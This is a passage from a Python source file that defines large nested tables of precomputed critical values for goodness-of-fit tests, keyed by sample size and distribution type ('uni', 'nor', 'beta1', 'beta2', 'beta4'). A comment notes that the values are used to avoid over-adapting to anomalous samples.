'beta2': 0.8127163948003021, 'beta4': 0.11600632777201067}, 750: {'uni': 0.18353876060887495, 'nor': 0.47315381492266284, 'beta1': 0.1848466855593917, 'beta2': 0.6057402676429029, 'beta4': 0.12128921997929693}, 500: {'uni': 0.18626459428841338, 'nor': 0.3739859643670168, 'beta1': 0.18370108978687505, 'beta2': 0.4519785398696026, 'beta4': 0.12934443321886013}, 400: {'uni': 0.1846926635410675, 'nor': 0.3373977956534747, 'beta1': 0.18379894550505346, 'beta2': 0.4001772516695409, 'beta4': 0.1324871096490525}, 300: {'uni': 0.18335882742457615, 'nor': 0.30207061691602766, 'beta1': 0.18498395112897797, 'beta2': 0.36823738539844797, 'beta4': 0.1377813467667352}, 200: {'uni': 0.18146517018597558, 'nor': 0.2626023742570726, 'beta1': 0.18490638293978268, 'beta2': 0.3032691430926139, 'beta4': 0.14811129872849652}, 150: {'uni': 0.18567150605670413, 'nor': 0.24293312006244636, 'beta1': 0.1839383721262982, 'beta2': 0.275147983363257, 'beta4': 0.15562446570752247}, 100: {'uni': 0.18188590503553012, 'nor': 0.22192190869354672, 'beta1': 0.18220796971542047, 'beta2': 0.23656612557764944, 'beta4': 0.16384483291051324}, 75: {'uni': 0.18269712408432776, 'nor': 0.21086971209758135, 'beta1': 0.1834266929677532, 'beta2': 0.22384625002314135, 'beta4': 0.16689861495602365}, 50: {'uni': 0.1840829104983384, 'nor': 0.20409631279707927, 'beta1': 0.18537818691491365, 'beta2': 0.21037244642654657, 'beta4': 0.17260776897824953}, 30: {'uni': 0.1857425742322888, 'nor': 0.19571874411864754, 'beta1': 0.1841318534190506, 'beta2': 0.19779885160629435, 'beta4': 0.17876031436503564}, 20: {'uni': 0.1832365591664123, 'nor': 0.19167311662078532, 'beta1': 0.18394313243440424, 'beta2': 0.19630589705739027, 'beta4': 0.17733581077369834}, 10: {'uni': 0.18618532512109023, 'nor': 0.19128318068045697, 'beta1': 0.18757253910951685, 'beta2': 0.1883616111678228, 'beta4': 0.18555417888606063}}, 200: {1000: {'uni': 0.18447141627562533, 'nor': 0.7699551232189373, 'beta1': 0.18500514582732694, 'beta2': 0.9127793666354577, 
'beta4': 0.11011784883611928}, 750: {'uni': 0.18259356525682377, 'nor': 0.6257554784789408, 'beta1': 0.18488440955510677, 'beta2': 0.7088043074557446, 'beta4': 0.11359776947078477}, 500: {'uni': 0.18589358539985096, 'nor': 0.4829959037714713, 'beta1': 0.183474877505319, 'beta2': 0.514168880108097, 'beta4': 0.11953892464970942}, 400: {'uni': 0.18351796321070915, 'nor': 0.4164296854250865, 'beta1': 0.18195958720877065, 'beta2': 0.5056205486626194, 'beta4': 0.12416969797920921}, 300: {'uni': 0.18481464734448674, 'nor': 0.3658259098465722, 'beta1': 0.18663125274408293, 'beta2': 0.416910138713319, 'beta4': 0.13056310975294855}, 200: {'uni': 0.18530334268616938, 'nor': 0.302407317725596, 'beta1': 0.1834849866924257, 'beta2': 0.3292982361018997, 'beta4': 0.13984005968045923}, 150: {'uni': 0.18596448269266944, 'nor': 0.2739436092802089, 'beta1': 0.18707957912766168, 'beta2': 0.30543377100001085, 'beta4': 0.14629701832782}, 100: {'uni': 0.1832977085363229, 'nor': 0.23946363968388915, 'beta1': 0.18427350012102758, 'beta2': 0.2591834715329377, 'beta4': 0.15533563468189326}, 75: {'uni': 0.18356926635465065, 'nor': 0.2279517116490053, 'beta1': 0.1830851794256456, 'beta2': 0.23633947470700803, 'beta4': 0.16177484111825208}, 50: {'uni': 0.18425403756506012, 'nor': 0.2157915511740745, 'beta1': 0.1820152616826392, 'beta2': 0.21828882661440663, 'beta4': 0.16842779941176925}, 30: {'uni': 0.18360266531359176, 'nor': 0.20210998834312802, 'beta1': 0.18687171669955455, 'beta2': 0.20496758550143304, 'beta4': 0.17293751761529214}, 20: {'uni': 0.1851863710681571, 'nor': 0.19433366890581394, 'beta1': 0.18557623225739414, 'beta2': 0.19875199384282216, 'beta4': 0.17788405593123227}, 10: {'uni': 0.18634472764248708, 'nor': 0.19324764133732816, 'beta1': 0.18562771164336173, 'beta2': 0.19080409259813716, 'beta4': 0.18110054533211944}}, 150: {1000: {'uni': 0.1912754452360089, 'nor': 0.9625954838302346, 'beta1': 0.1850480515459952, 'beta2': 1.0300633923301075, 'beta4': 0.10637413003748875}, 750: 
{'uni': 0.18945058480162008, 'nor': 0.7695073156807593, 'beta1': 0.18526507906977255, 'beta2': 0.8083193173277922, 'beta4': 0.1106638358872608}, 500: {'uni': 0.185620108086503, 'nor': 0.5726722059040364, 'beta1': 0.18357606652829983, 'beta2': 0.6528292568827052, 'beta4': 0.11579632790357713}, 400: {'uni': 0.18917591701097058, 'nor': 0.49529277931636245, 'beta1': 0.1834642136948372, 'beta2': 0.5381420829901148, 'beta4': 0.12006342755769683}, 300: {'uni': 0.18687744942049392, 'nor': 0.419608439413199, 'beta1': 0.18478819848060082, 'beta2': 0.45118218759273077, 'beta4': 0.1258962883197106}, 200: {'uni': 0.18418101094464367, 'nor': 0.33878294396897896, 'beta1': 0.1829759224784113, 'beta2': 0.37076816072824964, 'beta4': 0.13532357390907895}, 150: {'uni': 0.18418481072808665, 'nor': 0.29815778996985826, 'beta1': 0.18625340494055306, 'beta2': 0.3241801066525806, 'beta4': 0.13951205890829702}, 100: {'uni': 0.18327140323275803, 'nor': 0.26188762705474206, 'beta1': 0.18344353301364413, 'beta2': 0.2752468213062559, 'beta4': 0.1503016146561893}, 75: {'uni': 0.18201478524070183, 'nor': 0.24581445083697057, 'beta1': 0.1853887999165348, 'beta2': 0.2445694630913998, 'beta4': 0.15565064425067696}, 50: {'uni': 0.18452051279131734, 'nor': 0.222129436245253, 'beta1': 0.18516263138095312, 'beta2': 0.22467151056734352, 'beta4': 0.16108458373940354}, 30: {'uni': 0.1824891516495398, 'nor': 0.2053607180567544, 'beta1': 0.18509905830949186, 'beta2': 0.20779712298354724, 'beta4': 0.1699616752517214}, 20: {'uni': 0.18300669688455398, 'nor': 0.20274525612006072, 'beta1': 0.18328208302262802, 'beta2': 0.19765528888056297, 'beta4': 0.17491649721982203}, 10: {'uni': 0.1848066711618625, 'nor': 0.19231164434042297, 'beta1': 0.18438331438611105, 'beta2': 0.19484072521797707, 'beta4': 0.17971946823829243}}, 100: {1000: {'uni': 0.19811466492827273, 'nor': 1.3512753542524134, 'beta1': 0.18272420510815907, 'beta2': 1.1851946304410805, 'beta4': 0.1021515448919693}, 750: {'uni': 0.19486636364500992, 
'nor': 1.0795208594455619, 'beta1': 0.1827435190842583, 'beta2': 0.8879856010389023, 'beta4': 0.10578996546915725}, 500: {'uni': 0.1878660706186934, 'nor': 0.7908944071120905, 'beta1': 0.18372014934617817, 'beta2': 0.7190908861845601, 'beta4': 0.10798328428429449}, 400: {'uni': 0.18856719881543738, 'nor': 0.6515181196215094, 'beta1': 0.18257792204790377, 'beta2': 0.6089945179002064, 'beta4': 0.11172974205029101}, 300: {'uni': 0.18480486550722386, 'nor': 0.5420471845411214, 'beta1': 0.18425739128256488, 'beta2': 0.49803792491577076, 'beta4': 0.1170983391444022}, 200: {'uni': 0.18410247561395535, 'nor': 0.4225705571887114, 'beta1': 0.1832629600404925, 'beta2': 0.3991187761792379, 'beta4': 0.12520010138008653}, 150: {'uni': 0.1831379504788031, 'nor': 0.35378535669622957, 'beta1': 0.18393102377460066, 'beta2': 0.3533201625197048, 'beta4': 0.1310612284316026}, 100: {'uni': 0.1851477358277497, 'nor': 0.30048949272859776, 'beta1': 0.18722881633512647, 'beta2': 0.2982703912186853, 'beta4': 0.13952949011220495}, 75: {'uni': 0.18420407052491966, 'nor': 0.2747464150268231, 'beta1': 0.1863893010233449, 'beta2': 0.2688833428777913, 'beta4': 0.14483526902687105}, 50: {'uni': 0.18272037174239453, 'nor': 0.24499943819688966, 'beta1': 0.18396142930712786, 'beta2': 0.23860133327254135, 'beta4': 0.15513414164226877}, 30: {'uni': 0.1842369811339266, 'nor': 0.21925965780532913, 'beta1': 0.18267665781136008, 'beta2': 0.21345155008926986, 'beta4': 0.16315465295018947}, 20: {'uni': 0.18596055862126862, 'nor': 0.20895267177449817, 'beta1': 0.18242691039042175, 'beta2': 0.20282499131835807, 'beta4': 0.17122285192412554}, 10: {'uni': 0.18557308492410754, 'nor': 0.19918179801171515, 'beta1': 0.1840271099140626, 'beta2': 0.1938309824025229, 'beta4': 0.1767417121054671}}, 75: {1000: {'uni': 0.20711268462000337, 'nor': 1.7730177547589154, 'beta1': 0.1869960981370644, 'beta2': 1.2726475334757859, 'beta4': 0.100342571351767}, 750: {'uni': 0.20243866747068975, 'nor': 1.3991570539695792, 'beta1': 
0.18513552603442698, 'beta2': 1.0017005109802415, 'beta4': 0.10276510802172498}, 500: {'uni': 0.1965709888981754, 'nor': 0.9742389984198174, 'beta1': 0.18355281840357834, 'beta2': 0.80284673792362, 'beta4': 0.10644357393348948}, 400: {'uni': 0.19146567109436297, 'nor': 0.841354076993409, 'beta1': 0.1855585099111213, 'beta2': 0.6565346919964216, 'beta4': 0.10781413077990055}, 300: {'uni': 0.18767169125550484, 'nor': 0.6612307292158803, 'beta1': 0.18405456456460575, 'beta2': 0.575015165674034, 'beta4': 0.11340006488072128}, 200: {'uni': 0.18875684035705986, 'nor': 0.5001358507311437, 'beta1': 0.18514163593432517, 'beta2': 0.44825655120643315, 'beta4': 0.11771535031911876}, 150: {'uni': 0.18273849384781432, 'nor': 0.4231160741504525, 'beta1': 0.18561439219437587, 'beta2': 0.38137814444752033, 'beta4': 0.1262731157515569}, 100: {'uni': 0.18225839061196816, 'nor': 0.338619585958276, 'beta1': 0.18186852876160955, 'beta2': 0.31617844744686563, 'beta4': 0.13374500648884993}, 75: {'uni': 0.18299158238453536, 'nor': 0.29961345440771225, 'beta1': 0.18696060459585148, 'beta2': 0.28468953064421093, 'beta4': 0.13946308848404163}, 50: {'uni': 0.1832723234116953, 'nor': 0.26283989390926227, 'beta1': 0.18506600379584687, 'beta2': 0.24750497454599002, 'beta4': 0.1481327869764839}, 30: {'uni': 0.18191405722869375, 'nor': 0.23431812960162796, 'beta1': 0.18521277623339458, 'beta2': 0.22079273390393087, 'beta4': 0.1592348611407742}, 20: {'uni': 0.18473341697360826, 'nor': 0.2195649379961785, 'beta1': 0.18563835105682194, 'beta2': 0.20770543157127955, 'beta4': 0.16479815778328769}, 10: {'uni': 0.18506924782584366, 'nor': 0.20570651820563146, 'beta1': 0.1866075791349083, 'beta2': 0.19341244195911075, 'beta4': 0.17748207906313238}}, 50: {1000: {'uni': 0.24103040620532545, 'nor': 2.627239706679091, 'beta1': 0.1874509583911653, 'beta2': 1.5677617919882278, 'beta4': 0.09789020561766841}, 750: {'uni': 0.22444541668429782, 'nor': 2.015315850284036, 'beta1': 0.18823153541894252, 'beta2': 
1.2133199248338002, 'beta4': 0.09979798541763203}, 500: {'uni': 0.2104911731606476, 'nor': 1.38982671099465, 'beta1': 0.18746213379969717, 'beta2': 0.9366731794445591, 'beta4': 0.10269358339160997}, 400: {'uni': 0.20531070615513639, 'nor': 1.148301345520581, 'beta1': 0.18554521120654618, 'beta2': 0.7860055480947616, 'beta4': 0.10501089981968535}, 300: {'uni': 0.19934989819705742, 'nor': 0.8993661590744696, 'beta1': 0.18318293203211186, 'beta2': 0.6644979497197328, 'beta4': 0.10756412793208994}, 200: {'uni': 0.1921846611195358, 'nor': 0.6606908760158289, 'beta1': 0.18423109397748733, 'beta2': 0.5140542101443047, 'beta4': 0.11311740549405308}, 150: {'uni': 0.18961104398723572, 'nor': 0.5431369687165466, 'beta1': 0.18627983842993445, 'beta2': 0.43577804383019, 'beta4': 0.11788729433993039}, 100: {'uni': 0.18510814836165915, 'nor': 0.43114936330892584, 'beta1': 0.18448355982106907, 'beta2': 0.35642356479702164, 'beta4': 0.12452405723524114}, 75: {'uni': 0.18347411444813314, 'nor': 0.3665250370541888, 'beta1': 0.18489904225754517, 'beta2': 0.3207238999009413, 'beta4': 0.13094014210262298}, 50: {'uni': 0.18152653854784864, 'nor': 0.3021554777109189, 'beta1': 0.1855837950623708, 'beta2': 0.26894400195384355, 'beta4': 0.13977255851048295}, 30: {'uni': 0.17944329155456532, 'nor': 0.25589954702925916, 'beta1': 0.18177564577800395, 'beta2': 0.2259481098108176, 'beta4': 0.15087949281315094}, 20: {'uni': 0.18285848202810834, 'nor': 0.23495619641475976, 'beta1': 0.18418902422158248, 'beta2': 0.21053639359909057, 'beta4': 0.16289925871937844}, 10: {'uni': 0.18270695707991996, 'nor': 0.2096678137972554, 'beta1': 0.18653089016810714, 'beta2': 0.19684068664753132, 'beta4': 0.1704553669593008}}, 30: {1000: {'uni': 0.35059610653095774, 'nor': 4.278063195318857, 'beta1': 0.20388816838421095, 'beta2': 1.930305431945286, 'beta4': 0.09798289618718463}, 750: {'uni': 0.30507003691713097, 'nor': 3.21820776280224, 'beta1': 0.19622584473615895, 'beta2': 1.5979743998440465, 'beta4': 
0.09714954501361119}, 500: {'uni': 0.26008473519802, 'nor': 2.2497384827957188, 'beta1': 0.1924900551191556, 'beta2': 1.1740862526243834, 'beta4': 0.09932387680106194}, 400: {'uni': 0.246066913448192, 'nor': 1.8039541962199412, 'beta1': 0.19029154767051165, 'beta2': 0.9792810501146351, 'beta4': 0.10044308660904461}, 300: {'uni': 0.22837881683581426, 'nor': 1.3951249872303733, 'beta1': 0.18464244517695091, 'beta2': 0.7923064688616753, 'beta4': 0.10371786223959582}, 200: {'uni': 0.2096008117213653, 'nor': 0.9894495628252942, 'beta1': 0.18661453750912715, 'beta2': 0.6265848402430967, 'beta4': 0.1058001385440015}, 150: {'uni': 0.2047520758256172, 'nor': 0.7821984888895062, 'beta1': 0.18759321457289763, 'beta2': 0.5198694245808844, 'beta4': 0.10807280355877953}, 100: {'uni': 0.19121268890754203, 'nor': 0.5928634651322495, 'beta1': 0.1840954961076464, 'beta2': 0.4184841874770464, 'beta4': 0.11527272387605526}, 75: {'uni': 0.1912910963358721, 'nor': 0.48913096110692394, 'beta1': 0.18215208706652994, 'beta2': 0.3547928099573867, 'beta4': 0.11922051901033888}, 50: {'uni': 0.18440606056882947, 'nor': 0.39561565247457786, 'beta1': 0.18223908669314237, 'beta2': 0.30220319429490433, 'beta4': 0.12812440980731452}, 30: {'uni': 0.18222407004959135, 'nor': 0.30418682264129604, 'beta1': 0.18679408185790608, 'beta2': 0.2491166973284583, 'beta4': 0.13942212483224153}, 20: {'uni': 0.18097656955489333, 'nor': 0.26515944288371085, 'beta1': 0.18367253348921583, 'beta2': 0.22596040797528127, 'beta4': 0.14749125985662656}, 10: {'uni': 0.1812785781213858, 'nor': 0.22411839439365913, 'beta1': 0.18377973985540141, 'beta2': 0.20261486000614173, 'beta4': 0.16383998193988902}}, 20: {1000: {'uni': 0.557588775025206, 'nor': 6.23263722804059, 'beta1': 0.24824273547433398, 'beta2': 2.5916665978624773, 'beta4': 0.09556521996049769}, 750: {'uni': 0.45544548344679703, 'nor': 4.960783858737055, 'beta1': 0.2315334208360766, 'beta2': 2.116834484867373, 'beta4': 0.09605379123194507}, 500: {'uni': 
0.36047636166919345, 'nor': 3.2882260206430223, 'beta1': 0.21162692388832308, 'beta2': 1.4976707301720542, 'beta4': 0.09610105856086308}, 400: {'uni': 0.3196200397941912, 'nor': 2.6396332773464715, 'beta1': 0.2046928363598519, 'beta2': 1.265541898484928, 'beta4': 0.09827851131902052}, 300: {'uni': 0.28281307995759886, 'nor': 2.011907686223302, 'beta1': 0.1998415817930172, 'beta2': 0.9828568650064285, 'beta4': 0.09994987623415}, 200: {'uni': 0.24538969043580305, 'nor': 1.407599774702493, 'beta1': 0.19433833988424531, 'beta2': 0.7602852314379016, 'beta4': 0.10173240503051327}, 150: {'uni': 0.22623111278829658, 'nor': 1.1172309316240872, 'beta1': 0.1893663211990802, 'beta2': 0.6112263086634806, 'beta4': 0.10524857569135072}, 100: {'uni': 0.21033799716194235, 'nor': 0.7960728357807297, 'beta1': 0.18863382329214456, 'beta2': 0.48583796438531557, 'beta4': 0.10944951155940488}, 75: {'uni': 0.20239363660320567, 'nor': 0.653354873083433, 'beta1': 0.18465183242228214, 'beta2': 0.40852522362409677, 'beta4': 0.11117099248230677}, 50: {'uni': 0.19241628654888826, 'nor': 0.49230178420719256, 'beta1': 0.18370029558550202, 'beta2': 0.3315673506671088, 'beta4': 0.12034526923407932}, 30: {'uni': 0.1838470566331029, 'nor': 0.3690970245177923, 'beta1': 0.18158906884639572, 'beta2': 0.2703572480667707, 'beta4': 0.1305763969399149}, 20: {'uni': 0.18439013813515145, 'nor': 0.3113933846355926, 'beta1': 0.18171723618996996, 'beta2': 0.2369287296609353, 'beta4': 0.13967615415157159}, 10: {'uni': 0.18179638952526822, 'nor': 0.24629649064457582, 'beta1': 0.18144757035417675, 'beta2': 0.20971828838261652, 'beta4': 0.15608505701021883}}, 10: {1000: {'uni': 1.630169780842474, 'nor': 13.623294187847977, 'beta1': 0.6537074318170204, 'beta2': 4.838110857510732, 'beta4': 0.09413800337231777}, 750: {'uni': 1.2606778724851384, 'nor': 9.898087519223337, 'beta1': 0.5360828395709647, 'beta2': 3.755077850787192, 'beta4': 0.09609909813587005}, 500: {'uni': 0.866979270399114, 'nor': 6.86185146993719, 
'beta1': 0.40719109616766064, 'beta2': 2.486938148944695, 'beta4': 0.09657207917263508}, 400: {'uni': 0.7234311603303463, 'nor': 5.533257506558093, 'beta1': 0.35555181458287194, 'beta2': 2.0684678266516845, 'beta4': 0.09575639679537408}, 300: {'uni': 0.5740562572746054, 'nor': 4.13961208846063, 'beta1': 0.30947004057833194, 'beta2': 1.5733033072118243, 'beta4': 0.09716579757282962}, 200: {'uni': 0.43012982000413774, 'nor': 2.806431923980102, 'beta1': 0.25923513854877184, 'beta2': 1.1217059286617272, 'beta4': 0.09769834869400658}, 150: {'uni': 0.3660568810176042, 'nor': 2.165907302955124, 'beta1': 0.2367881673186339, 'beta2': 0.8900796906245184, 'beta4': 0.0986555241279555}, 100: {'uni': 0.2963521456078561, 'nor': 1.4423314673071785, 'beta1': 0.21603240846651683, 'beta2': 0.6539876622911982, 'beta4': 0.101203675655721}, 75: {'uni': 0.26296739530637186, 'nor': 1.1761992322784602, 'beta1': 0.20484690859183285, 'beta2': 0.5351984389092316, 'beta4': 0.10492040345498926}, 50: {'uni': 0.22994652917703381, 'nor': 0.8431170822039252, 'beta1': 0.19350639779310821, 'beta2': 0.43102251731484564, 'beta4': 0.10827771561061793}, 30: {'uni': 0.2033383416551495, 'nor': 0.5806932221078154, 'beta1': 0.18502168086844142, 'beta2': 0.3218406334608748, 'beta4': 0.11399907323057486}, 20: {'uni': 0.1923057509260784, 'nor': 0.44699498766501866, 'beta1': 0.18199021346561728, 'beta2': 0.26969550832768435, 'beta4': 0.12249371308737968}, 10: {'uni': 0.17887078242976767, 'nor': 0.31761146933960366, 'beta1': 0.1766444136945467, 'beta2': 0.21765707501491735, 'beta4': 0.13832752334780735}}}} # skipcq: FLK-E231, FLK-E501 # List of the critical distances to charactersitics of distributions. # These distances are used to prevent adapting too much on an anomalous sample in the gof tests. 
self.crit_dist_upd_cm = {0.05: {1000: {1000: {'uni': 0.013833831976126072, 'beta1': 0.0003329885568229087, 'beta2': 0.22974622882027226, 'beta4': [0.0018908295164874612, 1.0697194182314242]}, 750: {'uni': 0.016990917368002133, 'beta1': 0.0006113165919820284, 'beta2': 0.23684284676662615, 'beta4': [0.002770944333718528, 1.0556667242656854]}, 500: {'uni': 0.023600774750904736, 'beta1': 0.0009199173841866722, 'beta2': 0.2753909552830473, 'beta4': [0.0037082814337906045, 1.0482794905722563]}, 400: {'uni': 0.02640029217064558, 'beta1': 0.0013622133600444137, 'beta2': 0.27352545783196475, 'beta4': [0.005913349923484303, 1.0456546892584218]}, 300: {'uni': 0.04006129826220925, 'beta1': 0.002720238345700929, 'beta2': 0.292583092890596, 'beta4': [0.007281293542356923, 1.0400206581224385]}, 200: {'uni': 0.07032909758220027, 'beta1': 0.005970864163422045, 'beta2': 0.34167794009457075, 'beta4': [0.009494471525280058, 1.0349849380276617]}, 150: {'uni': 0.1012642936451668, 'beta1': 0.013652756645306451, 'beta2': 0.39479224192835694, 'beta4': [0.01194023988657095, 1.0281722066537058]}, 100: {'uni': 0.13313776389084864, 'beta1': 0.022784367464349673, 'beta2': 0.41847533458373803, 'beta4': [0.020038218784910505, 1.0236478943934566]}, 75: {'uni': 0.14039046466276972, 'beta1': 0.04097056181025277, 'beta2': 0.46162284607879156, 'beta4': [0.0243947240305133, 1.0222016752862486]}, 50: {'uni': 0.22621965744544004, 'beta1': 0.0737194908849337, 'beta2': 0.517884604992627, 'beta4': [0.03269564227543516, 1.0182370445806526]}, 30: {'uni': 0.3065027272179305, 'beta1': 0.19186519999119622, 'beta2': 0.6071682127005255, 'beta4': [0.05374474739717058, 1.0137406936599733]}, 20: {'uni': 0.4579999299085743, 'beta1': 0.26347326935911947, 'beta2': 0.6609864081120751, 'beta4': [0.07348286747648815, 1.0145791780700397]}, 10: {'uni': 0.7093161375782928, 'beta1': 0.5119588745735099, 'beta2': 0.8207303938633076, 'beta4': [0.12023859377021034, 1.0100370019812506]}}, 750: {1000: {'uni': 0.01647447307790564, 
'beta1': 0.0005070015607912077, 'beta2': 0.2629768360729676, 'beta4': [0.0033495902420869147, 1.0812966928373942]}, 750: {'uni': 0.018829802981785562, 'beta1': 0.0004891759389985897, 'beta2': 0.264938253953924, 'beta4': [0.0031531587883013427, 1.0792673641589363]}, 500: {'uni': 0.024080037100477052, 'beta1': 0.0012244937314284828, 'beta2': 0.24359686255819019, 'beta4': [0.004206903547084224, 1.076095067847491]}, 400: {'uni': 0.027584807407406455, 'beta1': 0.0016752340265126897, 'beta2': 0.26260070623151555, 'beta4': [0.005580712827419352, 1.060010603580021]}, 300: {'uni': 0.05146390929515149, 'beta1': 0.0026509847812920093, 'beta2': 0.303092230265923, 'beta4': [0.006365207456983704, 1.0541922110575421]}, 200: {'uni': 0.059327890449950973, 'beta1': 0.006979003319027128, 'beta2': 0.31285174277571925, 'beta4': [0.010945442489642966, 1.0474108448665012]}, 150: {'uni': 0.07603679549416355, 'beta1': 0.013496169428675047, 'beta2': 0.3555003501031682, 'beta4': [0.012749501962998663, 1.0375483550076372]}, 100: {'uni': 0.10561248103143273, 'beta1': 0.03187318794369734, 'beta2': 0.417146268097644, 'beta4': [0.020713494340326415, 1.0335080956133786]}, 75: {'uni': 0.14405962731563504, 'beta1': 0.043732800833889925, 'beta2': 0.4610806633425333, 'beta4': [0.02597652100879122, 1.0295014609635151]}, 50: {'uni': 0.20966063546789582, 'beta1': 0.07890839084581142, 'beta2': 0.5102418622987501, 'beta4': [0.043904941213022464, 1.0248461468788301]}, 30: {'uni': 0.38962310099779707, 'beta1': 0.1915135222435897, 'beta2': 0.6101573464223917, 'beta4': [0.06118300251929863, 1.0194659530900299]}, 20: {'uni': 0.428272065096665, 'beta1': 0.2518149043542126, 'beta2': 0.6947446253738557, 'beta4': [0.07492008381074046, 1.017655002271037]}, 10: {'uni': 0.7045396300117182, 'beta1': 0.5239027718500835, 'beta2': 0.8357669029306978, 'beta4': [0.11572334717911056, 1.0123883559270712]}}, 500: {1000: {'uni': 0.027224573572945946, 'beta1': 0.0013397428793559755, 'beta2': 0.3001985870543363, 'beta4': 
[0.004003070786742122, 1.1172596869640967]}, 750: {'uni': 0.028043993584209094, 'beta1': 0.0010541824335439582, 'beta2': 0.2823382920552223, 'beta4': [0.0036581315313476436, 1.1034623133987689]}, 500: {'uni': 0.02471763430703555, 'beta1': 0.0012248560308923057, 'beta2': 0.3307660083666149, 'beta4': [0.003302816728501824, 1.0934914146805519]}, 400: {'uni': 0.03236939986555113, 'beta1': 0.001492188135934995, 'beta2': 0.2834271159680854, 'beta4': [0.005281401022483379, 1.0858354786705675]}, 300: {'uni': 0.03914763722813296, 'beta1': 0.003120837500885247, 'beta2': 0.3326263681825811, 'beta4': [0.0059725430409256035, 1.080984369602341]}, 200: {'uni': 0.0674042868008787, 'beta1': 0.006767448043648924, 'beta2': 0.3349053851571213, 'beta4': [0.011969283802141791, 1.064357245786229]}, 150: {'uni': 0.082100927216335, 'beta1': 0.015091611739326043, 'beta2': 0.36047891136615184, 'beta4': [0.012143500193535273, 1.0603960329700548]}, 100: {'uni': 0.11090915635366168, 'beta1': 0.027855094159398915, 'beta2': 0.3960346148033574, 'beta4': [0.019873043933564375, 1.046442261406773]}, 75: {'uni': 0.13673584694945418, 'beta1': 0.04335726498923612, 'beta2': 0.46353116897047625, 'beta4': [0.022393899130873997, 1.0454004320894406]}, 50: {'uni': 0.26894500541594535, 'beta1': 0.07457662656723034, 'beta2': 0.5208863650222786, 'beta4': [0.036275561342054785, 1.0352702855461442]}, 30: {'uni': 0.3716936672337271, 'beta1': 0.17149387158728827, 'beta2': 0.6186004901982012, 'beta4': [0.06131349205497524, 1.0286449977262795]}, 20: {'uni': 0.467854736258422, 'beta1': 0.2513799996100335, 'beta2': 0.7006936802929652, 'beta4': [0.08626269634774561, 1.0230576102360847]}, 10: {'uni': 0.7362089605117925, 'beta1': 0.56086440263617, 'beta2': 0.8099518386992302, 'beta4': [0.11677030825502484, 1.0190838199658914]}}, 400: {1000: {'uni': 0.025284520784155894, 'beta1': 0.0016403734885094123, 'beta2': 0.31576478638382965, 'beta4': [0.004799521441428401, 1.149091195956356]}, 750: {'uni': 0.027799931928113246, 
'beta1': 0.0015799682859719154, 'beta2': 0.3713849781520663, 'beta4': [0.004689070159467552, 1.124317344925337]}, 500: {'uni': 0.027483125208737986, 'beta1': 0.0024269483783257067, 'beta2': 0.27701755632147346, 'beta4': [0.004591320892501386, 1.1297845739588293]}, 400: {'uni': 0.03084627816775358, 'beta1': 0.0023979691180455814, 'beta2': 0.2730921713151016, 'beta4': [0.004974023608712, 1.106968985947837]}, 300: {'uni': 0.04342497872614666, 'beta1': 0.005122316708978925, 'beta2': 0.30396801422598557, 'beta4': [0.005941217951056899, 1.0999705260170498]}, 200: {'uni': 0.06731729987144204, 'beta1': 0.006636474398841804, 'beta2': 0.32885187834473645, 'beta4': [0.00949566072118334, 1.0888691708222482]}, 150: {'uni': 0.08264251761514971, 'beta1': 0.010132361123248543, 'beta2': 0.36101864325194, 'beta4': [0.012446278508938115, 1.0763280315015658]}, 100: {'uni': 0.10637172944422692, 'beta1': 0.01878644943776261, 'beta2': 0.4093008044094355, 'beta4': [0.020820333377676758, 1.06113616348469]}, 75: {'uni': 0.13795394349254128, 'beta1': 0.038995240660645046, 'beta2': 0.4405290225383519, 'beta4': [0.02473764963709022, 1.0527356149901959]}, 50: {'uni': 0.2406132500211715, 'beta1': 0.0700599044565557, 'beta2': 0.5265650730092543, 'beta4': [0.0339903732354553, 1.0462654860073552]}, 30: {'uni': 0.3173806374952389, 'beta1': 0.18444265554793618, 'beta2': 0.6325883170629072, 'beta4': [0.06610429250040999, 1.0355934184804019]}, 20: {'uni': 0.423548511058078, 'beta1': 0.25465448942736657, 'beta2': 0.6725333843878142, 'beta4': [0.07438553906653562, 1.0311030590947072]}, 10: {'uni': 0.6688467656594845, 'beta1': 0.5112523271928556, 'beta2': 0.8293005648094274, 'beta4': [0.1197769525104218, 1.0249310486188403]}}, 300: {1000: {'uni': 0.03646544382648058, 'beta1': 0.003251490535066205, 'beta2': 0.3201872293239301, 'beta4': [0.006951397024167792, 1.193926518402875]}, 750: {'uni': 0.03648594176728415, 'beta1': 0.002636200271072265, 'beta2': 0.3174843999565502, 'beta4': [0.006473086994037532, 
1.183601205377894]}, 500: {'uni': 0.04072652314645194, 'beta1': 0.002558944110032064, 'beta2': 0.3251984717738673, 'beta4': [0.007789765735562143, 1.1835748123967167]}, 400: {'uni': 0.0393383633533453, 'beta1': 0.003847932927579061, 'beta2': 0.2860643127801613, 'beta4': [0.0062386354375463336, 1.1654789898222022]}, 300: {'uni': 0.04397095573137874, 'beta1': 0.0030280024317967777, 'beta2': 0.3789180859983394, 'beta4': [0.009249413107330818, 1.127841007910807]}, 200: {'uni': 0.06792667259937368, 'beta1': 0.005983841955930665, 'beta2': 0.3413062807433401, 'beta4': [0.009552799854332017, 1.0999288094012698]}, 150: {'uni': 0.0869747164851829, 'beta1': 0.012290799030814667, 'beta2': 0.3649645571564334, 'beta4': [0.014748639591924993, 1.0996203885277052]}, 100: {'uni': 0.11636318979764056, 'beta1': 0.02817460092180575, 'beta2': 0.4096280985600957, 'beta4': [0.01922673614387383, 1.0813822423223525]}, 75: {'uni': 0.15706280301874442, 'beta1': 0.039130351614999406, 'beta2': 0.42263093869109436, 'beta4': [0.024857576975933136, 1.0690602414012946]}, 50: {'uni': 0.28048873616461506, 'beta1': 0.06810514058491184, 'beta2': 0.5234093698507445, 'beta4': [0.037664123441808646, 1.0630363349497096]}, 30: {'uni': 0.3213033129924418, 'beta1': 0.16748462352883312, 'beta2': 0.6323735870294098, 'beta4': [0.05278897520198084, 1.0554917161294344]}, 20: {'uni': 0.5291733323766079, 'beta1': 0.2881578438762836, 'beta2': 0.7065202369109715, 'beta4': [0.07581480967034805, 1.043877964407442]}, 10: {'uni': 0.6636936363784581, 'beta1': 0.5173161477349097, 'beta2': 0.8275178393484293, 'beta4': [0.11949087211913659, 1.030446523297133]}}, 200: {1000: {'uni': 0.056736728276972896, 'beta1': 0.006839089656716795, 'beta2': 0.3272153807911214, 'beta4': [0.008455904960003245, 1.248625041859922]}, 750: {'uni': 0.05163279737714969, 'beta1': 0.010730487701533719, 'beta2': 0.3635515979264522, 'beta4': [0.007813754917837435, 1.2349194372374692]}, 500: {'uni': 0.05338620611203703, 'beta1': 0.006038477096334755, 
